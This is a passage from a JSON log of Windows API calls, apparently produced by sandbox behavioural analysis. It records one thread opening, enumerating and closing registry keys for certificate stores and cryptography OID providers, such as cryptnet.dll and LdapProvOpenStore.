            "parentcaller": "0x7ffee0ba16fe",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              }
            ],
            "repeated": 0,
            "id": 1722
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0b9e023",
            "parentcaller": "0x7ffee0b9e0d9",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "ValueName",
                "value": "DisallowedCertSyncDeltaTime"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime"
              }
            ],
            "repeated": 0,
            "id": 1723
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0ba16b2",
            "parentcaller": "0x7ffee0b9e125",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1724
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe549",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID"
              }
            ],
            "repeated": 0,
            "id": 1725
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5c6",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "EncodingType 0"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0"
              }
            ],
            "repeated": 0,
            "id": 1726
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5f4",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "EncodingType 0"
              },
              {
                "name": "Handle",
                "value": "0x0000056c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0"
              }
            ],
            "repeated": 0,
            "id": 1727
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbec4c",
            "parentcaller": "0x7ffee0bbe6a7",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000056c"
              },
              {
                "name": "SubKey",
                "value": "CertDllOpenStoreProv"
              },
              {
                "name": "Handle",
                "value": "0x00000570"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv"
              }
            ],
            "repeated": 0,
            "id": 1728
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000570"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "#16"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16"
              }
            ],
            "repeated": 0,
            "id": 1729
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000570"
              },
              {
                "name": "SubKey",
                "value": "#16"
              },
              {
                "name": "Handle",
                "value": "0x00000574"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16"
              }
            ],
            "repeated": 0,
            "id": 1730
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000574"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "2"
              },
              {
                "name": "MaxValueNameLength",
                "value": "8"
              },
              {
                "name": "MaxValueLength",
                "value": "66"
              }
            ],
            "repeated": 0,
            "id": 1731
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000574"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Dll"
              },
              {
                "name": "Data",
                "value": "C:\\Windows\\System32\\cryptnet.dll"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16\\Dll"
              }
            ],
            "repeated": 0,
            "id": 1732
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000574"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "ValueName",
                "value": "FuncName"
              },
              {
                "name": "Data",
                "value": "LdapProvOpenStore"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16\\FuncName"
              }
            ],
            "repeated": 0,
            "id": 1733
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000574"
              }
            ],
            "repeated": 0,
            "id": 1734
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000570"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": "Ldap"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap"
              }
            ],
            "repeated": 0,
            "id": 1735
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000570"
              },
              {
                "name": "SubKey",
                "value": "Ldap"
              },
              {
                "name": "Handle",
                "value": "0x00000574"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap"
              }
            ],
            "repeated": 0,
            "id": 1736
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000574"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "2"
              },
              {
                "name": "MaxValueNameLength",
                "value": "8"
              },
              {
                "name": "MaxValueLength",
                "value": "66"
              }
            ],
            "repeated": 0,
            "id": 1737
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000574"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Dll"
              },
              {
                "name": "Data",
                "value": "C:\\Windows\\System32\\cryptnet.dll"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap\\Dll"
              }
            ],
            "repeated": 0,
            "id": 1738
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000574"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "ValueName",
                "value": "FuncName"
              },
              {
                "name": "Data",
                "value": "LdapProvOpenStore"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap\\FuncName"
              }
            ],
            "repeated": 0,
            "id": 1739
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000574"
              }
            ],
            "repeated": 0,
            "id": 1740
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000570"
              },
              {
                "name": "Index",
                "value": "2"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\"
              }
            ],
            "repeated": 0,
            "id": 1741
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe8a4",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000570"
              }
            ],
            "repeated": 0,
            "id": 1742
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6c9",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000056c"
              }
            ],
            "repeated": 0,
            "id": 1743
          },
          {
            "timestamp": "2025-11-20 10:58:35,375",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5c6",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": "EncodingType 1"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1"
              }
            ],
            "repeated": 0,
            "id": 1744
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5f4",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "EncodingType 1"
              },
              {
                "name": "Handle",
                "value": "0x0000056c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1"
              }
            ],
            "repeated": 0,
            "id": 1745
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbec4c",
            "parentcaller": "0x7ffee0bbe6a7",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000056c"
              },
              {
                "name": "SubKey",
                "value": "CertDllOpenStoreProv"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllOpenStoreProv"
              }
            ],
            "repeated": 0,
            "id": 1746
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6c9",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000056c"
              }
            ],
            "repeated": 0,
            "id": 1747
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5c6",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "Index",
                "value": "2"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\"
              }
            ],
            "repeated": 0,
            "id": 1748
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6e2",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1749
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores"
              }
            ],
            "repeated": 0,
            "id": 1750
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1751
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bb703e",
            "parentcaller": "0x7ffee0bba69a",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1752
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bc1c01",
            "parentcaller": "0x7ffee0bb77b9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots"
              }
            ],
            "repeated": 0,
            "id": 1753
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bd5a88",
            "parentcaller": "0x7ffee0bb77d4",
            "category": "misc",
            "api": "NtQuerySystemInformation",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SystemInformationClass",
                "value": "103"
              }
            ],
            "repeated": 1,
            "id": 1754
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba9de",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1755
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bb5d0c",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": ""
              },
              {
                "name": "Handle",
                "value": "0x0000056c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\"
              }
            ],
            "repeated": 0,
            "id": 1756
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbab7c",
            "parentcaller": "0x7ffee0bb7e1f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1757
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba9de",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1758
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bb5d0c",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": ""
              },
              {
                "name": "Handle",
                "value": "0x00000570"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\"
              }
            ],
            "repeated": 0,
            "id": 1759
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbab7c",
            "parentcaller": "0x7ffee0bb7e1f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1760
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores"
              }
            ],
            "repeated": 0,
            "id": 1761
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\EnterpriseCertificates\\Root"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1762
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bb703e",
            "parentcaller": "0x7ffee0bba69a",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1763
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba9de",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\EnterpriseCertificates\\Root"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1764
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bb5d0c",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": ""
              },
              {
                "name": "Handle",
                "value": "0x00000574"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\"
              }
            ],
            "repeated": 0,
            "id": 1765
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbab7c",
            "parentcaller": "0x7ffee0bb7e1f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1766
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba9de",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\SmartCardRoot"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
